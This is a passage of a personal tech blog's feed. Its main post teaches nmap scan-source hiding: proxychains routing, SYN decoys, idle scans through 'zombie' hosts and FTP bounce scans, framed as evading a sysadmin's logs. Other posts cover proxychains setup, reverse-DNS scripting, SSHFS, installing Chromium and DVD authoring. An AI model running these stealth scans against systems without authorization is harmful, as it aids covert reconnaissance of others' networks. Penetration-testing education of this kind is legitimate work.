&lt;/div&gt;</summary><category term="credit cards"></category><category term="donation"></category><category term="good cause"></category><category term="linux"></category><category term="visa"></category></entry><entry><title>The Art of Nmap Scanning, Part 1: Source Address Hiding and Obfuscation Techniques</title><link href="https://spareclockcycles.org/2010/04/18/the-art-of-nmap-scanning-part-1-source-address-hiding-and-obfuscation-techniques.html" rel="alternate"></link><updated>2010-04-18T00:49:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-04-18:2010/04/18/the-art-of-nmap-scanning-part-1-source-address-hiding-and-obfuscation-techniques.html</id><summary type="html">&lt;p&gt;This is the first part in a series of posts that I am writing on the
wonderful world of &lt;a class="reference external" href="http://nmap.org/"&gt;nmap&lt;/a&gt;, one of the most useful tools out there for
the aspiring hacker. In this post, I will demonstrate a number of ways
in which one can obscure, or even completely hide, the source IP address
of &lt;a class="reference external" href="http://en.wikipedia.org/wiki/Port_scanner"&gt;port scans&lt;/a&gt; during a pen test from the eyes of even the most
diligent sysadmin's logs, allowing you to hide in a wonderful shroud of
anonymity until you decide when and where to strike. As a bonus, many of
these techniques can also be used to scan hosts that might otherwise
have been unaccessible or only partially accessible to a normal scan,
letting us map out the network much more effectively.&lt;/p&gt;
&lt;div class="section" id="socks-proxy-scanning"&gt;
&lt;h2&gt;SOCKS Proxy Scanning&lt;/h2&gt;
&lt;p&gt;Probably the most obvious and straightforward of the techniques in this
post, this strategy requires access to a public &lt;a class="reference external" href="http://en.wikipedia.org/wiki/SOCKS"&gt;SOCKS&lt;/a&gt; proxy (list
&lt;a class="reference external" href="http://www.samair.ru/proxy/"&gt;here&lt;/a&gt;), a compromised/public SSH host,&amp;nbsp; or (if you wish to abuse the
service, and have your scans be incredibly slow and probably not very
reliable) &lt;a class="reference external" href="http://www.torproject.org/"&gt;Tor&lt;/a&gt;. It also requires &lt;a class="reference external" href="http://proxychains.sourceforge.net/"&gt;proxychains&lt;/a&gt; (or a similar
application, like &lt;a class="reference external" href="http://tsocks.sourceforge.net/"&gt;tsocks&lt;/a&gt;) to be installed on your system.
Essentially, the idea is that instead of connecting directly to your
target, as you normally would, you route your connect scan through one
or more SOCKS proxies before finally attempting to connect to the given
host and port. To do this is quite easy: simply set up proxychains as in
my &lt;a class="reference external" href="https://spareclockcycles.org/2010/04/15/socksify-anything/"&gt;previous post&lt;/a&gt;, and use the following command to scan your host:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
proxychains nmap -sT -PO target_host
&lt;/pre&gt;
&lt;p&gt;And that's pretty much all there is to it. However, there are some
significant downsides to using this method to avoid detection. First,
any open SOCKS proxies you use might be logging all of your actions (or
could even be a &lt;a class="reference external" href="http://en.wikipedia.org/wiki/Honeypot_%28computing%29"&gt;honeypot&lt;/a&gt;), pretty much defeating the purpose of using
it in the first place. In addition, routing your connections through
proxies also obviously causes issues with latency, slowing down your
scans both because you have to actually complete the three-way handshake
(can't use SYN scans), and because you are simply adding more hops to
the route. However, it can be useful in cases where you need to tunnel
your scans into (or out of) a network, it allows for the proper
execution (through the proxy) of most nmap detection scripts, and is
pretty easy to set up, so it's something to keep in mind.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="syn-scan-spoofing"&gt;
&lt;h2&gt;SYN Scan Spoofing&lt;/h2&gt;
&lt;p&gt;While this technique does not completely hide one's IP address from
being logged, it does at least prevent a system administrator from being
able to determine the true source of a scan, absent any extra probing
attempts. Essentially, nmap's SYN scan spoofing takes advantage of the
fact that, because you are not trying to complete the three-way TCP
handshake, you can spoof your address to be anything you want without
consequence. Of course, you won't be able to see the results of the scan
unless you use your IP address because you won't receive the SYN-ACK if
you don't (unless you're using idle scanning, which we will see
shortly). However, you CAN hide your real IP address in a sea of fakes,
preventing a concerned administrator from being able to trace back the
true origin of the scan before you launch your assault. Neat, huh?
Here's all you need to do:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
sudo nmap -sS -P0 -D decoy_host1,decoy_host2,decoy_host3 target_host
&lt;/pre&gt;
&lt;p&gt;A brief explanation: the &amp;quot;-sS&amp;quot; flag specifies that nmap should use a SYN
scan, and the -D flag allows us to input an arbitrary amount of decoy
hosts to add to our scan. The -P0 flag, as before, disables ICMP pings,
so once again you might be scanning a host that is down. The more decoys
you add, the more hidden you will stay, but the slower your scan will
go. If you are on a local network, also note that this will not change
your &lt;a class="reference external" href="http://en.wikipedia.org/wiki/MAC_address"&gt;MAC&lt;/a&gt; address, and this could definitely be logged (and is a dead
giveaway that something bad is going on.) In addition, don't use the -A
flag (or similar), as the version detection techniques used by nmap
could expose your IP address (more
&lt;a class="reference external" href="http://nmap.org/book/vscan-technique.html"&gt;here&lt;/a&gt; if you're curious).
Despite these limitations, this scan is definitely quite effective at
hiding your identity, and, because of how easy it is to use, is probably
the first one that you want to turn to for general scanning.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="zombie-idle-scanning"&gt;
&lt;h2&gt;Zombie (Idle) Scanning&lt;/h2&gt;
&lt;p&gt;Probably the coolest (and most complex) of these techniques is the idle
scan (more awesomely known as the zombie scan). The concept behind
zombie scanning is essentially to, in the great tradition of hacking,
turn the logic of TCP protocol against itself. Rather than lengthen this
already lengthy post with a description of how this scan works, I will
refer the interested person to nmap's &lt;a class="reference external" href="http://nmap.org/book/idlescan.html"&gt;very thorough documentation of
the scan&lt;/a&gt;. In very short, though, this technique can completely hide
your IP address, given you can find a zombie host that is receiving very
little traffic and has predictable IP ID's. Now, these can be pretty
tough requirements, as most modern OS's have&amp;nbsp; switched to rather
unpredictable ID's, but if you can find an older host (think printers,
legacy systems) that has these features this is probably the best attack
out of the lot as anonymity goes. The easiest way to go about doing this
is to either a.) just scan the network with nmap and look for hosts that
look unkempt, or b.) (my preferred method) just use your &lt;a class="reference external" href="https://spareclockcycles.org/2010/04/25/updated-reverse-dns-tool/"&gt;reverse DNS
mapping of the network&lt;/a&gt; to find a printer, which in all likelihood will
be suitable as a zombie. To check if your chosen host is vulnerable, you
can use the useful tool hping3:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
sudo hping3 -Q target_host -p port -S
&lt;/pre&gt;
&lt;p&gt;This sends SYN packets to the host and prints out the difference in IP
ID's between the current and previous SYN+ACKs received. This is sample
output from a host that could be used for a zombie scan:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
HPING [target] (eth0 [target]):
 100949560 +100949560
 100949570 +10
 100949580 +10
 100949590 +10
&lt;/pre&gt;
&lt;p&gt;If you can find a host like this, it truly and completely hides your IP
address from the victim host. Here's all you need to do with nmap:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
sudo nmap -P0 -sI zombie_host target_host
&lt;/pre&gt;
&lt;p&gt;That's all there is to it! Given you found a suitable host, nmap will
now scan the target host, and it will look as though the zombie host is
the malicious host. Sneaky, huh? Note: if the zombie host receives ANY
extra traffic during your scan from other hosts, you could get invalid
scan results. Keep in mind that your results might not be wholly
accurate using this method, and that scanning using this method can be
quite slow.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="ftp-bounce-scanning"&gt;
&lt;h2&gt;FTP Bounce Scanning&lt;/h2&gt;
&lt;p&gt;The final technique I will be presenting here is &lt;a class="reference external" href="http://nmap.org/nmap_doc.html#bounce"&gt;FTP bounce scanning&lt;/a&gt;,
a slightly more obscure but definitely useful method of port scanning.
When the FTP protocol was first defined in &lt;a class="reference external" href="http://www.faqs.org/rfcs/rfc959.html"&gt;RFC 959&lt;/a&gt;, it contained an
interesting specification: that the PORT command could be used to
attempt to connect to a port on another machine. While useful,
certainly, for connecting to other FTP servers easily, it's writers
(fortunately or unfortunately) didn't realize that this could and would
be abused. The specifications were changed, but many older FTP servers
still have this vulnerability (especially many network printers, oddly
enough). If you can find a host that has an FTP server with this problem
(which, nicely enough, nmap can scan for with the -A flag), you can use
this scan to force the FTP server to act as an unwilling proxy for your
scan, completely hiding your IP address. It can also, nicely, be used to
scan inside a network in the case that the FTP server is exposed but the
rest of the network isn't. In addition, you could also possibly use it
to launch further attacks against the host, as FTP bounce servers can be
used to proxy arbitrary data onto a TCP connection. So what's the
downside? It is SLOW. Very, very slow. I'm working on a script that can
divide the scanning amongst multiple FTP bounce servers, which could
speed things up a bit, but it still has some bugs to work out (I'll
update here with a post when I get time to finish it). Really though,
it's best to keep this one for when anonymity is a must and speed is not
a concern. For those situations, though, it works perfectly. Here's how
to do it:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
nmap -P0 -b ftp_bounce_host target_host
&lt;/pre&gt;
&lt;p&gt;Wait awhile, and you will hopefully have a list of open ports, and your
victim will be wondering why a network printer just tried connecting to
some ports on their system. Win!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="conclusion"&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;&amp;quot;When you do things right, people won't be sure you've done anything at
all.&amp;quot; --Futurama&lt;/p&gt;
&lt;p&gt;Although each technique here is great at hiding your identity while port
scanning, that doesn't give you a license to be stupid and scan anything
and everything. Be selective (and be legal). While it's great to know
that J. Random Sysadmin isn't going to be able to track you down if he
notices something, it'd be best if he never noticed anything at all.
After all, it may put people on their guard, which could make your job
much, much harder. Chose which hosts and ports you want to focus on
selectively (see my &lt;a class="reference external" href="https://spareclockcycles.org/2010/04/25/updated-reverse-dns-tool/"&gt;reverse DNS scanning tool&lt;/a&gt;), only enable features
in nmap that require extra connections when you have to (&lt;a class="reference external" href="http://nmap.org/book/man.html"&gt;nmap
documentation&lt;/a&gt;), and, for the love of zombie jesus, don't use -p1-65535
unless you ABSOLUTELY have to. Stick to those rules, and things should
go quite well.&lt;/p&gt;
&lt;p&gt;In my next post, I will be exploring the IDS/IPS evasion techniques
built into nmap, that can allow you to scan behind otherwise restrictive
firewalls. Until then, have fun scanning!&lt;/p&gt;
&lt;div class="zemanta-pixie" style="margin-top: 10px; height: 15px;"&gt;&lt;p&gt;&lt;a class="reference external" href="http://reblog.zemanta.com/zemified/a8b92b87-4395-46e3-8039-bef5cb9fbb89/"&gt;&lt;img alt="Reblog this post [with Zemanta]" src="http://img.zemanta.com/reblog_e.png?x-id=a8b92b87-4395-46e3-8039-bef5cb9fbb89" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
</summary><category term="anonymity"></category><category term="hacking"></category><category term="hping3"></category><category term="nmap"></category><category term="Pen Testing"></category><category term="port scanning"></category><category term="proxychains"></category><category term="socks"></category><category term="TCP"></category></entry><entry><title>Socksify Anything</title><link href="https://spareclockcycles.org/2010/04/15/socksify-anything.html" rel="alternate"></link><updated>2010-04-15T21:09:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-04-15:2010/04/15/socksify-anything.html</id><summary type="html">&lt;p&gt;As a follow-up to one of my posts awhile back, I figured I'd share a
small tip with those who don't use SOCKS proxies quite as often as I do.
In my &lt;a class="reference external" href="https://spareclockcycles.org/2009/04/10/ssh-secure-browsing-via-socks-proxy/"&gt;previous post&lt;/a&gt;, I showed how to set up an &lt;a class="reference external" href="http://en.wikipedia.org/wiki/SOCKS"&gt;SOCKS proxy&lt;/a&gt; that
tunnelled your (now encrypted) traffic through a remote SSH server, as
well as how to configure &lt;a class="reference external" href="http://www.mozilla.com/firefox/"&gt;Firefox&lt;/a&gt; to use that tunnel. But what if your
application doesn't support SOCKS proxies? And what if you want to
tunnel through multiple hosts (I'm sure you could think of a situation
:P)?&lt;/p&gt;
&lt;p&gt;Well, you're in luck: &lt;a class="reference external" href="http://proxychains.sourceforge.net/"&gt;proxychains&lt;/a&gt; can handle all of that. When used
to execute an application, proxychains acts a middleware layer,
intercepting all TCP connections, wrapping them in the SOCKS protocol,
and routing them through the proxies of your choice. If you're on
Ubuntu, it's, as usual, brilliantly easy to install. One &amp;quot;sudo apt-get
install proxychains&amp;quot; and you're good to go. Now how do we go about using
it?&lt;/p&gt;
&lt;p&gt;The first thing you need to do to use proxychains is to set up a
configuration file. On Ubuntu (and I'm assuming, any other install),
there is a default file in /etc/proxychains.conf that you can look at
for guidance, but I have &lt;a class="reference external" href="http://www.personal.utulsa.edu/~ben-schmidt/proxychains.conf"&gt;included mine for reference&lt;/a&gt; just in case.
Now, there are three places proxychains will look for a config file when
it is executed: in the local directory, at
~/.proxychains/proxychains.conf , and in /etc/proxychains.conf (and they
are prioritized in that order). Chose yours according to what works best
for you. I'd assume that either your home folder or etc folder would be
the best, as it will work without a fuss no matter what your $PWD is.
Now, the proxychains config has a good number of options, so you'll need
to know what's best for you. For most, the dynamic chain is best: it
functions as long as one of the proxies in it's configuration page is
online. I'd also recommend enabling proxy_dns if it's not on, to
prevent DNS leakage. The rest of the default options should be fine.
After that, all you need to do is add your proxy in the form of
&amp;quot;proxy_type host port&amp;quot;, which, if you're using an SSH proxy like in my
previous post, will be something like &amp;quot;socks4 127.0.0.1 6789&amp;quot; .&lt;/p&gt;
&lt;p&gt;Now save the file, and you're ready to go. If you, say, want to update
your system, all you need to do is &amp;quot;sudo proxychains apt-get update&amp;quot;,
and away it goes. If you want to chain your traffic through multiple
hosts, simply add more to your config file, and run &amp;quot;proxychains
./myapp&amp;quot;. Enjoy!&lt;/p&gt;
&lt;p&gt;Update 04/16/2010: As mentioned in a previous post, &lt;a class="reference external" href="http://tsocks.sourceforge.net/"&gt;tsocks&lt;/a&gt; is also a
good application for socksifying connections, and worth trying if
proxychains doesn't work for you. However, you can't (as far as I know)
use it to chain multiple proxies together, so keep that in mind.&lt;/p&gt;
&lt;div class="zemanta-pixie" style="margin-top:10px;height:15px;"&gt;&lt;p&gt;&lt;a class="reference external" href="http://reblog.zemanta.com/zemified/5d749b47-b18e-4dd0-aa88-99004e51e6d9/"&gt;&lt;img alt="Reblog this post [with Zemanta]" src="http://img.zemanta.com/reblog_e.png?x-id=5d749b47-b18e-4dd0-aa88-99004e51e6d9" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;</summary><category term="Add new tag"></category><category term="apt-get"></category><category term="proxy"></category><category term="sockisfy"></category><category term="socks"></category><category term="ssh"></category><category term="Ubuntu"></category></entry><entry><title>Reverse DNS Lookups with dnspython</title><link href="https://spareclockcycles.org/2010/04/13/reverse-dns-lookups-with-dnspython.html" rel="alternate"></link><updated>2010-04-13T13:43:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-04-13:2010/04/13/reverse-dns-lookups-with-dnspython.html</id><summary type="html">&lt;p&gt;Hey all,&lt;/p&gt;
&lt;p&gt;Sorry once again for the long lull in posting. School has not been kind
towards my desire to blog. I will hopefully be posting more frequently
in the coming weeks and months.&lt;/p&gt;
&lt;p&gt;Anyways, now that the apologies are out of the way, here's a little
something I was messing around with this morning during class. It's
often useful to be able to do &lt;a class="reference external" href="http://en.wikipedia.org/wiki/Reverse_DNS_lookup"&gt;reverse DNS&lt;/a&gt; lookups of a given IP range
to find hosts with interesting domain names, whether they're interesting
because it looks like a network administrator has forgotten about them,
or because they look like they weren't meant to be found (you'd be
surprised how many machines rely on this sort of &lt;a class="reference external" href="http://en.wikipedia.org/wiki/Security_through_obscurity"&gt;security through
obscurity&lt;/a&gt;), or just because they have something like &amp;quot;mail&amp;quot; or &amp;quot;proxy&amp;quot;
in their name. A simple way to do this is to write up a short bash
script that uses the host or dig commands. However, this is slow
(because you have to spawn a ton of&amp;nbsp;processes), and I don't get to use
Python.&lt;/p&gt;
&lt;p&gt;Enter dnspython. dnspython is a great tool for working with DNS, so I'd
suggest you &lt;a class="reference external" href="http://www.dnspython.org/"&gt;look through their site&lt;/a&gt; if you're interested in messing
around with DNS at all. Doing a reverse lookup of an IP address is quite
easy:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
from dns import resolver,reversename
addr=reversename.from_address(&amp;quot;192.168.0.1&amp;quot;)
str(resolver.query(addr,&amp;quot;PTR&amp;quot;)[0])
&lt;/pre&gt;
&lt;p&gt;This will probably throw a NXDOMAIN error, being a local address and
all, but you get the idea. Taking this, it's obviously very easy to make
a fast, effective script for scanning large ranges of IP addresses to
find potentially interesting hosts.&lt;/p&gt;
&lt;p&gt;I took a bit and wrote up a short python script using this technique
(and a small reverse dns module that you can use in other programs) . I
have attached it in case anyone would find that useful.&amp;nbsp;Usage
instructions are included:&amp;nbsp;&lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/revdns.tar.gz"&gt;revdns.tar.gz&lt;/a&gt; . Be sure that you have
dnspython installed, or else this will probably not work :P .&lt;/p&gt;
&lt;p&gt;Hopefully I'll be back soon enough with some more interesting and in
depth things I've been working on.&lt;/p&gt;
&lt;p&gt;UPDATE 04/24/10: So yeah, I just realized that I mistakenly referenced
&amp;quot;PyDNS&amp;quot; as the name of the module I used, when in fact it was the
incredibly useful &lt;a class="reference external" href="http://www.dnspython.org/"&gt;dnspython&lt;/a&gt; module. My bad. That's what I get for not
checking my posts thoroughly. I updated all the references to it
accordingly, but I figured for the sake of honesty I would clarify here
as well. I also updated the source to deal with lookup timeouts a little
better, if you care. Happy hacking!&lt;/p&gt;
&lt;div class="zemanta-pixie" style="margin-top: 10px; height: 15px;"&gt;&lt;p&gt;&lt;a class="reference external" href="http://reblog.zemanta.com/zemified/41e60162-fef3-4f5f-b102-b69ca176f552/"&gt;&lt;img alt="Reblog this post [with Zemanta]" src="http://img.zemanta.com/reblog_e.png?x-id=41e60162-fef3-4f5f-b102-b69ca176f552" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;</summary><category term="dns"></category><category term="dnspython"></category><category term="hacking"></category><category term="Pen Testing"></category><category term="python"></category><category term="reverse dns"></category></entry><entry><title>SSHFS: Securely Access a Remote Filesystem</title><link href="https://spareclockcycles.org/2009/05/18/sshfs-securely-access-a-remote-filesystem.html" rel="alternate"></link><updated>2009-05-18T15:47:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2009-05-18:2009/05/18/sshfs-securely-access-a-remote-filesystem.html</id><summary type="html">&lt;p&gt;Once again, I find myself singing the praises of &lt;a class="reference external" href="http://en.wikipedia.org/wiki/Secure_Shell"&gt;SSH&lt;/a&gt;. Seriously, is
there much of a reason to have any other ports open anymore? The latest
trick I have added to my list of things SSH can do is presenting a
remote &lt;a class="reference external" href="http://en.wikipedia.org/wiki/File_system"&gt;filesystem&lt;/a&gt;, securely.&amp;nbsp; Now, I'm sure most of us are aware that
you can transfer files over SSH using a &lt;a class="reference external" href="http://en.wikipedia.org/wiki/Protocol_%28computing%29"&gt;protocol&lt;/a&gt; called &lt;a class="reference external" href="http://en.wikipedia.org/wiki/SSH_file_transfer_protocol"&gt;SFTP&lt;/a&gt;. What
you may or may not be aware is that you can mount this remote filesystem
locally using a nifty little tool called &lt;a class="reference external" href="http://en.wikipedia.org/wiki/SSHFS"&gt;SSHFS&lt;/a&gt;. This is incredibly
useful in a number of situations, allowing you to access remote files in
a way that is easy for the user (as easy as local filesystems), easier
to set up than solutions such as &lt;a class="reference external" href="http://en.wikipedia.org/wiki/Network_File_System_%28protocol%29"&gt;NFS&lt;/a&gt;, and as secure as SSH itself.&lt;/p&gt;
&lt;p&gt;All you have to do on the remote machine you wish to access is have
&lt;a class="reference external" href="http://www.openssh.com"&gt;OpenSSH&lt;/a&gt; listening somewhere. For the client machine, you need to make
sure you have SSHFS installed. To do this on Ubuntu, simply run:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
sudo apt-get install sshfs
&lt;/pre&gt;
&lt;p&gt;Now, to mount the filesystem locally, we first need to create a &lt;a class="reference external" href="http://en.wikipedia.org/wiki/Mount_%28computing%29"&gt;mount
point&lt;/a&gt; for the filesystem:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
mkdir /path/to/mountpoint
chown user /path/to/mountpoint
&lt;/pre&gt;
&lt;p&gt;Where user is your username and sshfs is the location of the mountpoint.
Now, to go ahead and mount the remote filesystem, simply execute this
command with your own information inserted:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
sshfs remote-username&amp;#64;address.of.server:/remote/folder/to/mount /path/to/mountpoint
&lt;/pre&gt;
&lt;p&gt;Enter your password, and that's it! Your remote filesystem should now be
mounted.&lt;/p&gt;
&lt;p&gt;Well that's pretty cool in itself, but what if we want to go farther and
have it mount at startup without any interaction from us? No problem,
thanks to another cool feature of SSH called public key authentication.
This feature allows us to log in to a system without providing the
password of the user we are authenticating as, and instead
authenticating users based on their RSA keys. If you trust me that this
is secure, you can skip the next paragraph, but if you don't, or you are
curious how this works, read on.&lt;/p&gt;
&lt;p&gt;The initial key exchange that SSH does is encrypted using an asymmetric
encryption algorithm called &lt;a class="reference external" href="http://en.wikipedia.org/wiki/RSA"&gt;RSA&lt;/a&gt;. In this key exchange, the goal is to
exchange a symmetric key (AES, DES, whatever&amp;nbsp; you want) over RSA, which
is unfortunately too slow to handle the large amount of data that needs
to be encrypted to secure all of the SSH traffic. It is ideal, however,
for assuring that a key exchange stays secure. The way it works is that
each participant, both client and server, have a public key and a
private key, and you give out the public key to anyone you want to be
able to send you data. Once encrypted with the public key, the only way
you can decrypt the data is with the private key, which only the local
computer has. This technique has the useful property of providing both
confidentiality and, as long as the private key is kept secret,
authenticity. This means that as long as the private key is kept secret,
you can authenticate to a system based solely on the public key, because
no one but the authorized machine should be able to decrypt the proper
symmetric key if it does not have the private key. If you would like
more explanation than the incredibly brief overview I just gave, go
check out the Wikipedia articles on RSA and on SSH, it should give you
all the information you want.&lt;/p&gt;
&lt;p&gt;Now that you don't feel like you're doing something incredibly dangerous
(or maybe you still do, and you just like danger...:P ), follow &lt;a class="reference external" href="http://sial.org/howto/openssh/publickey-auth/"&gt;these
steps provided by OpenSSH on how to set up public key authentication
between two hosts&lt;/a&gt;.&amp;nbsp; Once done, all that's left to do is add the sshfs
command that we used earlier to mount the remote filesystem to a startup
script somewhere. To do this in Ubuntu/GNOME, you can simply go to
System-&amp;gt;Preferences-&amp;gt;Startup Applications and add a new entry that uses
our command from earlier as the command to be executed at login. If you
are not on Ubuntu or using GNOME, you should be able to find
documentation somewhere on how to make something run on startup.&lt;/p&gt;
&lt;p&gt;That's all there is too it, hope someone finds it useful. Just a short
note, if you need to unmount the share, simply execute sudo umount
/path/to/mountpoint and you'll be fine. Enjoy!&lt;/p&gt;
&lt;div class="zemanta-pixie" style="margin-top:10px;height:15px;"&gt;&lt;p&gt;&lt;a class="reference external" href="http://reblog.zemanta.com/zemified/63572218-1f82-4fcb-af73-26531fe02276/"&gt;&lt;img alt="Reblog this post [with Zemanta]" src="http://img.zemanta.com/reblog_e.png?x-id=63572218-1f82-4fcb-af73-26531fe02276" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;</summary><category term="Authentication"></category><category term="Encryption"></category><category term="filesystems"></category><category term="linux"></category><category term="Public-key cryptography"></category><category term="RSA"></category><category term="Secure Shell"></category><category term="Security"></category><category term="ssh"></category><category term="Ubuntu"></category></entry><entry><title>Howto: Install Chromium on Ubuntu</title><link href="https://spareclockcycles.org/2009/05/04/howto-install-chromium-on-ubuntu.html" rel="alternate"></link><updated>2009-05-04T11:34:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2009-05-04:2009/05/04/howto-install-chromium-on-ubuntu.html</id><summary type="html">&lt;p&gt;Hey all, long time no post yet again. Exams can do that to you...but if
you are much more fortunate than I and have some time to kill, I would
highly suggest taking the pre-alpha of Chromium (the open source base of
Google Chrome) for a spin. For a long while now I've been looking for a
decent browser replacement for Firefox on my netbook, which is almost
unbearably slow. Thankfully for my mobile browsing experience, Chromium
seems to be shaping up to be that browser. Still has tons of bugs and
crashes occasionaly, but for pre-alpha it's still really polished and
*really* fast. I will be writing a more thorough review once I get the
time, but until then you all can just see for yourself.&lt;/p&gt;
&lt;p&gt;A big fat warning before we begin: EXPECT THINGS TO BREAK. This isn't
even in alpha yet, so there are no guarantees as to your experience.
That said, I've had a pretty good experience with it so far.&lt;/p&gt;
&lt;p&gt;All you really need to do to get Chromium installed is to add the
nightly PPA repository that the developers were kind enough to set up
for all of us Ubuntu users and install the chromium-browser package. To
do this, simply do the following:&lt;/p&gt;
&lt;p&gt;Open up a terminal (or use Alt+F2) and execute the following command:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
sudo gedit /etc/apt/sources.list
&lt;/pre&gt;
&lt;p&gt;Now go to the &lt;a class="reference external" href="https://launchpad.net/~chromium-daily/+archive/ppa"&gt;PPA site&lt;/a&gt; to get the correct lines to add into the
file.&amp;nbsp; To do this, simply select your version of Ubuntu and it will tell
you what lines you need. It should look something like this (the lines
for Intrepid):&lt;/p&gt;
&lt;pre class="literal-block"&gt;
deb http://ppa.launchpad.net/chromium-daily/ppa/ubuntu intrepid main
deb-src http://ppa.launchpad.net/chromium-daily/ppa/ubuntu intrepid main
&lt;/pre&gt;
&lt;p&gt;Add these to the end of the file, save, then exit.&lt;/p&gt;
&lt;p&gt;Now you need to add the repository key. Simply execute this command:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
sudo apt-key adv --recv-keys --keyserver keyserver.ubuntu.com fbef0d696de1c72ba5a835fe5a9bf3bb4e5e17b5
&lt;/pre&gt;
&lt;p&gt;Great! The repository is now installed and verified. Now, simply update
the repositories and install the package by running the following
commands:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
sudo apt-get update
sudo apt-get install chromium-browser
&lt;/pre&gt;
&lt;p&gt;That's it! Chromium should now be installed on your system, ready for
you play around with. Enjoy.&lt;/p&gt;
</summary><category term="chrome"></category><category term="chromium"></category><category term="Google"></category><category term="linux"></category><category term="Ubuntu"></category></entry><entry><title>Howto: Restoring DVD Backups on Ubuntu with DeVeDe</title><link href="https://spareclockcycles.org/2009/04/14/howto-restoring-dvd-backups-on-ubuntu-with-devede.html" rel="alternate"></link><updated>2009-04-14T14:39:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2009-04-14:2009/04/14/howto-restoring-dvd-backups-on-ubuntu-with-devede.html</id><summary type="html">&lt;p&gt;As a follow-up to my &lt;a class="reference external" href="https://spareclockcycles.org/2008/12/11/handbrake-for-dvd-ripping-on-ubuntu/"&gt;previous post on using Handbrake to rip DVDs&lt;/a&gt;, I
wanted to do a short write-up on how to use a program called &lt;a class="reference external" href="http://www.rastersoft.com/programas/devede.html"&gt;DeVeDe&lt;/a&gt;
to restore those MKV, AVI, and MP4 files that you ripped earlier back to
a DVD that you can use on any DVD player.&lt;/p&gt;
&lt;p&gt;Before finding DeVeDe, I had been looking for a good solution for DVD
creation on Linux for awhile. However, nothing had really impressed me
very much. They generally had clunky, bloated UIs and didn't support a
wide range of file formats. DeVeDe changes all that; it uses the same
mencoder backend that Handbrake does, allowing it to support a wide
range of files (pretty much anything mencoder supports). It also sports
a very simple but powerful UI, allowing you to make pretty much any
customization you want to the menu and to have very complex DVD title
structures. This is while also not being overly complex for entry level
users, and pretty enough that it doesn't burn your retinas to look at
it.&lt;/p&gt;
&lt;p&gt;Sound good? Then let's get started. First, you of course need to install
it. To do this on Ubuntu (Hardy/Intrepid/Jaunty, probably others as
well), simply open up a terminal and execute the following command:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
sudo apt-get install devede
&lt;/pre&gt;
&lt;p&gt;That's it! Alternatively, you can install it through Synaptic by
searching for devede and installing the package. But what fun is that?
:P&lt;/p&gt;
&lt;p&gt;Now that DeVeDe is installed, let's open it up and take a look.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://spareclockcycles.files.wordpress.com/2009/04/screenshot-disc-type-selection-devede.png"&gt;&lt;img alt="Select Disc Type - DeVeDe" src="http://spareclockcycles.files.wordpress.com/2009/04/screenshot-disc-type-selection-devede.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;As you can see, you'll first be prompted for what kind of CD/DVD you
want to make. For this tutorial, we will assume you're making a normal
DVD, but there are a lot of other options you can follow if you wish.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://spareclockcycles.files.wordpress.com/2009/04/screenshot-main-screen-devede.png"&gt;&lt;img alt="Main Screen - DeVeDe" src="http://spareclockcycles.files.wordpress.com/2009/04/screenshot-main-screen-devede.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Now we are presented with the home screen, the place where all the magic
happens. You are started out with the most simple DVD possible: a single
DVD title, generically named, and a simple default menu. From here, you
can do pretty much anything you want to do. In the interest of keeping
this simple, we will assume that you just want to burn a backup of a
single movie.&amp;nbsp; First things first: let's name the title. To do this,
simply click on Properties.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://spareclockcycles.files.wordpress.com/2009/04/screenshot-title-properties-devede.png"&gt;&lt;img alt="Title Properties - DeVeDe" src="http://spareclockcycles.files.wordpress.com/2009/04/screenshot-title-properties-devede.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Here, simply enter whatever you want the title to be named, and select
the action you want taken after its finished (I would suggest just going
to the menu afterwards). After you're done, click OK.&lt;/p&gt;
&lt;p&gt;We now need to add a video file to the title. To do this, simply click
the Add button under the Files box on the right.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://spareclockcycles.files.wordpress.com/2009/04/screenshot-file-properties-devede.png"&gt;&lt;img alt="File Properties - DeVeDe" src="http://spareclockcycles.files.wordpress.com/2009/04/screenshot-file-properties-devede.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Click the file dialog button and select your video file. I would also
suggest changing the format from PAL to NTSC if you are living in the
U.S., most DVD players expect NTSC content here. If you know differently
for yours though, or it can handle both, then don't worry about it. If
you do need to change to NTSC and you're adding a lot of video files,
you can make this the default on the home screen. From the add file
dialog screen, you can also chose what audio track you want to use (if
there are multiple), and you can add your own custom subtitle files
simply by clicking the add button next to the subtitle box and selecting
